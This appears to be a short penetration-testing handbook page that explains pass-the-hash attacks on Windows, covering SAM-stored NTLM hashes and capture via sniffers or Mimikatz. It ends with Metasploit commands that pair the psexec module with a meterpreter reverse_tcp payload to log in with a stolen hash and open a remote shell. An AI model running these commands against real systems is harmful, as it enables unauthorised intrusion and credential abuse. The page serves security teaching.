handbook/tools/4.Exploitation/Metasploit/Modules/Add-on/Pass-the-Hash.md
2024-08-31 01:07:22 +02:00

1.3 KiB

General

Pass-the-hash (PtH) is a technique that allows an attacker to authenticate to a remote system using the underlying NTLM or LAN Manager (LM) hash of a user's password, instead of the actual password. This can allow an attacker to gain access to a system or network without knowing the actual password of the user.

On a Windows system, user passwords are stored in a hashed format in the system's local security database, called the Security Account Manager (SAM). When a user enters their password, the system hashes the entered password and compares it to the stored hash to authenticate the user.

In a PtH attack, the attacker obtains the hash of a user's password and uses it to authenticate to a system as that user. This can be done by capturing the hash through a variety of means, such as through a network sniffer, by extracting it from a compromised system, or by using a tool like Mimikatz. Once the attacker has the hash, they can use it to authenticate to a system without knowing the actual password.

Commands

Make sure you have gather some hash before starting this step and also have a meterpreter session

PtH Module

use windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
show options   ---> Set the options (RHOST, RPORT, SMB DOMAIN.., USER/PASS or HASH)
run